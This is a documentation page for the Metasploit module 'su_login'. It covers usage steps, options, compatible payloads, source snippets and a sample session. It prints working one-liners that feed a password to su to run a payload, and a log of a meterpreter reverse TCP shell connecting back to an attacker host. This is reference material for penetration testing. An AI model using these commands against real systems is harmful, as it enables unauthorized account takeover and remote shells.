Login to Another User with Su on Linux / Unix Systems - Metasploit


This page contains detailed information about how to use the exploit/linux/local/su_login metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Login to Another User with Su on Linux / Unix Systems
Module: exploit/linux/local/su_login
Source code: modules/exploits/linux/local/su_login.rb
Disclosure date: 1971-11-03
Last modification time: 2021-02-17 12:33:59 +0000
Supported architecture(s): x86, x64
Supported platform(s): Linux, Unix
Target service / protocol: -
Target network port(s): -
List of CVEs: -

This module attempts to create a new login session by invoking the su command of a valid username and password. If the login is successful, a new session is created via the specified payload. Because su forces passwords to be passed over stdin, this module attempts to invoke a psuedo-terminal with python, python3, or script.

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage


Note: To run a local exploit, make sure you are at the msf prompt. Also, to check the session ID, use the sessions command.

msf > use exploit/linux/local/su_login
msf exploit(su_login) > show targets
    ... a list of targets ...
msf exploit(su_login) > set TARGET target-id
msf exploit(su_login) > show options
    ... show and set options ...
msf exploit(su_login) > set SESSION session-id
msf exploit(su_login) > exploit

Required Options


  • SESSION: The session to run this module on.

Knowledge Base


Description


This module attempts to create a new login session by invoking the su command of a valid username and password. If the login is successful, a new session is created via the specified payload. While this functionality can be reproduced by a TTY shell, a hacker might want to switch users with a meterpreter session, or simply have all of their shells managed in one place.

The su command is used in Linux and Unix environments to change to another user in Linux. We can use this command to launch our payload as another user by running su - [username] -c [payload]. However, because you cannot pass in the password into su directly, we have to get a little more crafty. By running a command in sh, we can pipe the output to our su command (kind of) by using the following command: sh -c 'sleep 1; echo [password]' | script /dev/null -qc 'su - [username] -c [payload]'.

Working example: sh -c 'sleep 1; echo lamepassword' | script /dev/null -qc 'su - admin -c /tmp/shell'

In order for the above example to work, the script command must be apart of the util-linux version 2.26+ package. If this is not the case, this module can attempt to use Python's pty library.

Working example: python -c "import os, pty, base64; os.close(0); pty.spawn('su - admin -c /tmp/shell'.split(), lambda fd: os.read(fd, 1024), lambda fd: 'lamepassword')"

Verification Steps


  1. Start msfconsole
  2. Get a session
  3. Get valid target username and password
  4. Do: use exploit/linux/local/su_login
  5. Do: set SESSION [SESSION]
  6. Do: set USERNAME [USERNAME]
  7. Do: set PASSWORD [PASSWORD]
  8. Do: set PAYLOAD linux/x86/meterpreter/reverse_tcp
  9. Do: set LHOST [LHOST]
  10. Do: set LPORT [LPORT]
  11. Do: run
  12. You should get a new session as the specified user

Options


### USERNAME The username of the user to switch to

### PASSWORD The password of the user to switch to

Scenarios


  meterpreter > getuid
  Server username: tester @ edf3515e4c8f (uid=1000, gid=1000, euid=1000, egid=1000)
  meterpreter > background
  [*] Backgrounding session 1...  

  msf > use exploit/linux/local/su_login 
  msf exploit(linux/local/su_login) > set SESSION 1
  msf exploit(linux/local/su_login) > set USERNAME admin
  msf exploit(linux/local/su_login) > set PASSWORD lamepassword
  msf exploit(linux/local/su_login) > set PAYLOAD linux/x86/meterpreter/reverse_tcp
  msf exploit(linux/local/su_login) > set LHOST 192.168.3.193
  msf exploit(linux/local/su_login) > set LPORT 4445
  msf exploit(linux/local/su_login) > run

  [*] Started reverse TCP handler on 192.168.3.193:4445 
  [*] Uploading payload to target
  [*] Attempting to login with su
  [*] Sending stage (976712 bytes) to 172.17.0.2
  [*] Meterpreter session 2 opened (192.168.3.193:4445 -> 172.17.0.2:39868) at 2020-09-23 04:26:49 -0400

  meterpreter > getuid
  Server username: admin @ 59f089909a39 (uid=1001, gid=1001, euid=1001, egid=1001)

Go back to menu.

Msfconsole Usage


Here is how the linux/local/su_login exploit module looks in the msfconsole:

msf6 > use exploit/linux/local/su_login

[*] Using configured payload linux/x86/meterpreter/reverse_tcp
msf6 exploit(linux/local/su_login) > show info

       Name: Login to Another User with Su on Linux / Unix Systems
     Module: exploit/linux/local/su_login
   Platform: Linux, Unix
       Arch: x86, x64
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 1971-11-03

Provided by:
  Gavin Youker <[email protected]>

Available targets:
  Id  Name
  --  ----
  0   Linux x86
  1   Linux x86_64

Check supported:
  Yes

Basic options:
  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  PASSWORD                   no        Password to authenticate with.
  SESSION                    yes       The session to run this module on.
  USERNAME  root             yes       Username to authenticate with.

Payload information:

Description:
  This module attempts to create a new login session by invoking the 
  su command of a valid username and password. If the login is 
  successful, a new session is created via the specified payload. 
  Because su forces passwords to be passed over stdin, this module 
  attempts to invoke a psuedo-terminal with python, python3, or 
  script.

Module Options


This is a complete list of options available in the linux/local/su_login exploit:

msf6 exploit(linux/local/su_login) > show options

Module options (exploit/linux/local/su_login):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD                   no        Password to authenticate with.
   SESSION                    yes       The session to run this module on.
   USERNAME  root             yes       Username to authenticate with.

Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Linux x86

Advanced Options


Here is a complete list of advanced options supported by the linux/local/su_login exploit:

msf6 exploit(linux/local/su_login) > show advanced

Module advanced options (exploit/linux/local/su_login):

   Name                    Current Setting  Required  Description
   ----                    ---------------  --------  -----------
   AutoCheck               true             no        Run check before exploit
   ContextInformationFile                   no        The information file that contains context information
   DisablePayloadHandler   false            no        Disable the handler code for the selected payload
   EXE::Custom                              no        Use custom exe instead of automatically generating a payload exe
   EXE::EICAR              false            no        Generate an EICAR file instead of regular payload exe
   EXE::FallBack           false            no        Use the default template in case the specified one is missing
   EXE::Inject             false            no        Set to preserve the original EXE function
   EXE::OldMethod          false            no        Set to use the substitution EXE generation method.
   EXE::Path                                no        The directory in which to look for the executable template
   EXE::Template                            no        The executable template file name.
   EnableContextEncoding   false            no        Use transient context when encoding payloads
   FileDropperDelay                         no        Delay in seconds before attempting cleanup
   ForceExploit            false            no        Override check result
   MSI::Custom                              no        Use custom msi instead of automatically generating a payload msi
   MSI::EICAR              false            no        Generate an EICAR file instead of regular payload msi
   MSI::Path                                no        The directory in which to look for the msi template
   MSI::Template                            no        The msi template file name
   MSI::UAC                false            no        Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
   VERBOSE                 false            no        Enable detailed status messages
   WORKSPACE                                no        Specify the workspace for this module
   WfsDelay                2                no        Additional delay in seconds to wait for a session
   WritableDir             /tmp             yes       A directory where we can write files

Payload advanced options (linux/x86/meterpreter/reverse_tcp):

   Name                         Current Setting  Required  Description
   ----                         ---------------  --------  -----------
   AppendExit                   false            no        Append a stub that executes the exit(0) system call
   AutoLoadStdapi               true             yes       Automatically load the Stdapi extension
   AutoRunScript                                 no        A script to run automatically on session creation.
   AutoSystemInfo               true             yes       Automatically capture system information on initialization.
   AutoUnhookProcess            false            yes       Automatically load the unhook extension and unhook the process
   AutoVerifySessionTimeout     30               no        Timeout period to wait for session validation to occur, in seconds
   EnableStageEncoding          false            no        Encode the second stage payload
   EnableUnicodeEncoding        false            yes       Automatically encode UTF-8 strings as hexadecimal
   HandlerSSLCert                                no        Path to a SSL certificate in unified PEM format, ignored for HTTP transports
   InitialAutoRunScript                          no        An initial script to run on session creation (before AutoRunScript)
   MeterpreterDebugLevel        0                yes       Set debug level for meterpreter 0-3 (Default output is strerr)
   PayloadProcessCommandLine                     no        The displayed command line that will be used by the payload
   PayloadUUIDName                               no        A human-friendly name to reference this unique payload (requires tracking)
   PayloadUUIDRaw                                no        A hex string representing the raw 8-byte PUID value for the UUID
   PayloadUUIDSeed                               no        A string to use when generating the payload UUID (deterministic)
   PayloadUUIDTracking          false            yes       Whether or not to automatically register generated UUIDs
   PingbackRetries              0                yes       How many additional successful pingbacks
   PingbackSleep                30               yes       Time (in seconds) to sleep between pingbacks
   PrependChrootBreak           false            no        Prepend a stub that will break out of a chroot (includes setreuid to root)
   PrependFork                  false            no        Prepend a stub that starts the payload in its own process via fork
   PrependSetgid                false            no        Prepend a stub that executes the setgid(0) system call
   PrependSetregid              false            no        Prepend a stub that executes the setregid(0, 0) system call
   PrependSetresgid             false            no        Prepend a stub that executes the setresgid(0, 0, 0) system call
   PrependSetresuid             false            no        Prepend a stub that executes the setresuid(0, 0, 0) system call
   PrependSetreuid              false            no        Prepend a stub that executes the setreuid(0, 0) system call
   PrependSetuid                false            no        Prepend a stub that executes the setuid(0) system call
   RemoteMeterpreterDebugFile                    no        Redirect Debug Info to a Log File
   ReverseAllowProxy            false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                    no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                       no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                           no        The specific communication channel to use for this listener
   ReverseListenerThreaded      false            yes       Handle every connection in a new thread (experimental)
   SessionCommunicationTimeout  300              no        The number of seconds of no activity before this session should be killed
   SessionExpirationTimeout     604800           no        The number of seconds before this session should be forcibly shut down
   SessionRetryTotal            3600             no        Number of seconds try reconnecting for on network failure
   SessionRetryWait             10               no        Number of seconds to wait between reconnect attempts
   StageEncoder                                  no        Encoder to use if EnableStageEncoding is set
   StageEncoderSaveRegisters                     no        Additional registers to preserve in the staged payload if EnableStageEncoding is set
   StageEncodingFallback        true             no        Fallback to no encoding if the selected StageEncoder is not compatible
   StagerRetryCount             10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait              5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                      false            no        Enable detailed status messages
   WORKSPACE                                     no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the linux/local/su_login module can exploit:

msf6 exploit(linux/local/su_login) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Linux x86
   1   Linux x86_64

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the linux/local/su_login exploit:

msf6 exploit(linux/local/su_login) > show payloads

Compatible Payloads
===================

   #   Name                                              Disclosure Date  Rank    Check  Description
   -   ----                                              ---------------  ----    -----  -----------
   0   payload/generic/custom                                             normal  No     Custom Payload
   1   payload/generic/debug_trap                                         normal  No     Generic x86 Debug Trap
   2   payload/generic/shell_bind_tcp                                     normal  No     Generic Command Shell, Bind TCP Inline
   3   payload/generic/shell_reverse_tcp                                  normal  No     Generic Command Shell, Reverse TCP Inline
   4   payload/generic/tight_loop                                         normal  No     Generic x86 Tight Loop
   5   payload/linux/x86/chmod                                            normal  No     Linux Chmod
   6   payload/linux/x86/exec                                             normal  No     Linux Execute Command
   7   payload/linux/x86/meterpreter/bind_ipv6_tcp                        normal  No     Linux Mettle x86, Bind IPv6 TCP Stager (Linux x86)
   8   payload/linux/x86/meterpreter/bind_ipv6_tcp_uuid                   normal  No     Linux Mettle x86, Bind IPv6 TCP Stager with UUID Support (Linux x86)
   9   payload/linux/x86/meterpreter/bind_nonx_tcp                        normal  No     Linux Mettle x86, Bind TCP Stager
   10  payload/linux/x86/meterpreter/bind_tcp                             normal  No     Linux Mettle x86, Bind TCP Stager (Linux x86)
   11  payload/linux/x86/meterpreter/bind_tcp_uuid                        normal  No     Linux Mettle x86, Bind TCP Stager with UUID Support (Linux x86)
   12  payload/linux/x86/meterpreter/reverse_ipv6_tcp                     normal  No     Linux Mettle x86, Reverse TCP Stager (IPv6)
   13  payload/linux/x86/meterpreter/reverse_nonx_tcp                     normal  No     Linux Mettle x86, Reverse TCP Stager
   14  payload/linux/x86/meterpreter/reverse_tcp                          normal  No     Linux Mettle x86, Reverse TCP Stager
   15  payload/linux/x86/meterpreter/reverse_tcp_uuid                     normal  No     Linux Mettle x86, Reverse TCP Stager
   16  payload/linux/x86/meterpreter_reverse_http                         normal  No     Linux Meterpreter, Reverse HTTP Inline
   17  payload/linux/x86/meterpreter_reverse_https                        normal  No     Linux Meterpreter, Reverse HTTPS Inline
   18  payload/linux/x86/meterpreter_reverse_tcp                          normal  No     Linux Meterpreter, Reverse TCP Inline
   19  payload/linux/x86/metsvc_bind_tcp                                  normal  No     Linux Meterpreter Service, Bind TCP
   20  payload/linux/x86/metsvc_reverse_tcp                               normal  No     Linux Meterpreter Service, Reverse TCP Inline
   21  payload/linux/x86/read_file                                        normal  No     Linux Read File
   22  payload/linux/x86/shell/bind_ipv6_tcp                              normal  No     Linux Command Shell, Bind IPv6 TCP Stager (Linux x86)
   23  payload/linux/x86/shell/bind_ipv6_tcp_uuid                         normal  No     Linux Command Shell, Bind IPv6 TCP Stager with UUID Support (Linux x86)
   24  payload/linux/x86/shell/bind_nonx_tcp                              normal  No     Linux Command Shell, Bind TCP Stager
   25  payload/linux/x86/shell/bind_tcp                                   normal  No     Linux Command Shell, Bind TCP Stager (Linux x86)
   26  payload/linux/x86/shell/bind_tcp_uuid                              normal  No     Linux Command Shell, Bind TCP Stager with UUID Support (Linux x86)
   27  payload/linux/x86/shell/reverse_ipv6_tcp                           normal  No     Linux Command Shell, Reverse TCP Stager (IPv6)
   28  payload/linux/x86/shell/reverse_nonx_tcp                           normal  No     Linux Command Shell, Reverse TCP Stager
   29  payload/linux/x86/shell/reverse_tcp                                normal  No     Linux Command Shell, Reverse TCP Stager
   30  payload/linux/x86/shell/reverse_tcp_uuid                           normal  No     Linux Command Shell, Reverse TCP Stager
   31  payload/linux/x86/shell_bind_ipv6_tcp                              normal  No     Linux Command Shell, Bind TCP Inline (IPv6)
   32  payload/linux/x86/shell_bind_tcp                                   normal  No     Linux Command Shell, Bind TCP Inline
   33  payload/linux/x86/shell_bind_tcp_random_port                       normal  No     Linux Command Shell, Bind TCP Random Port Inline
   34  payload/linux/x86/shell_reverse_tcp                                normal  No     Linux Command Shell, Reverse TCP Inline
   35  payload/linux/x86/shell_reverse_tcp_ipv6                           normal  No     Linux Command Shell, Reverse TCP Inline (IPv6)

Evasion Options


Here is the full list of possible evasion options supported by the linux/local/su_login exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(linux/local/su_login) > show evasion

Module evasion options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

username not found


Here is a relevant code snippet related to the "username not found" error message:

65:	    ])
66:	  end
67:	
68:	  # Main function to run the exploit.
69:	  def exploit
70:	    fail_with(Failure::NoAccess, 'username not found') unless user_exists(datastore['USERNAME'])
71:	
72:	    # Upload the payload and stager files.
73:	    print_status('Uploading payload to target')
74:	    payload_file = build_payload(generate_payload_exe, datastore['WritableDir'])
75:	

su not found on target machine


Here is a relevant code snippet related to the "su not found on target machine" error message:

80:	
81:	  # Function to check if target is exploitable.
82:	  def check
83:	    # Make sure su is installed.
84:	    unless command_exists?('su')
85:	      vprint_error('su not found on target machine')
86:	      return CheckCode::Safe
87:	    end
88:	
89:	    # Make sure a program to run the exploit is installed.
90:	    prorgam = find_exec_program

One of the following programs must be installed on target: python, python3, script


Here is a relevant code snippet related to the "One of the following programs must be installed on target: python, python3, script" error message:

87:	    end
88:	
89:	    # Make sure a program to run the exploit is installed.
90:	    prorgam = find_exec_program
91:	    unless prorgam
92:	      vprint_error('One of the following programs must be installed on target: python, python3, script')
93:	      return CheckCode::Safe
94:	    end
95:	
96:	    # Make sure script requirements are met.
97:	    if prorgam == 'script'

The '<COMMAND>' must be installed on target


Here is a relevant code snippet related to the "The '<COMMAND>' must be installed on target" error message:

97:	    if prorgam == 'script'
98:	      # Check for command dependencies.
99:	      commands = ['sh', 'sleep', 'echo', 'base64']
100:	      for command in commands
101:	        unless command_exists?(command)
102:	          vprint_error("The '#{command}' must be installed on target")
103:	          return CheckCode::Safe
104:	        end
105:	      end
106:	
107:	      # Check that the script program is apart of the util-linux package.

The 'script' program must be of the 'util-linux' package


Here is a relevant code snippet related to the "The 'script' program must be of the 'util-linux' package" error message:

105:	      end
106:	
107:	      # Check that the script program is apart of the util-linux package.
108:	      version = find_util_linux_verison
109:	      unless version
110:	        vprint_error("The 'script' program must be of the 'util-linux' package")
111:	        return CheckCode::Safe
112:	      end
113:	
114:	      # Check that util-linux in of a compatible version.
115:	      unless version >= Rex::Version.new('2.25')

The package 'util-linux' must be version 2.25 or higher


Here is a relevant code snippet related to the "The package 'util-linux' must be version 2.25 or higher" error message:

111:	        return CheckCode::Safe
112:	      end
113:	
114:	      # Check that util-linux in of a compatible version.
115:	      unless version >= Rex::Version.new('2.25')
116:	        vprint_error("The package 'util-linux' must be version 2.25 or higher")
117:	        return CheckCode::Safe
118:	      end
119:	    end
120:	
121:	    return CheckCode::Appears

directory '<DIR>' is on a noexec mount point


Here is a relevant code snippet related to the "directory '<DIR>' is on a noexec mount point" error message:

121:	    return CheckCode::Appears
122:	  end
123:	
124:	  # Function to build and write the payload.
125:	  def build_payload(contents, dir)
126:	    fail_with(Failure::NoAccess, "directory '#{dir}' is on a noexec mount point") if noexec?(dir)
127:	
128:	    filepath = "#{dir}/#{Rex::Text.rand_text_alpha(8)}"
129:	
130:	    write_file(filepath, contents)
131:	    chmod(filepath, 755)

Authentication failure


Here is a relevant code snippet related to the "Authentication failure" error message:

159:	    end
160:	
161:	    # Execute the exploit.
162:	    response = cmd_exec(command)
163:	
164:	    fail_with(Failure::NoAccess, 'invalid password') if response.to_s.include?('Authentication failure')
165:	    return true
166:	  end
167:	
168:	  def find_exec_program
169:	    return 'python' if command_exists?('python')

Go back to menu.


Go back to menu.

See Also


Check also the following modules related to this module:

Authors


Gavin Youker [email protected]

Version


This page has been produced using Metasploit Framework version 6.2.23-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.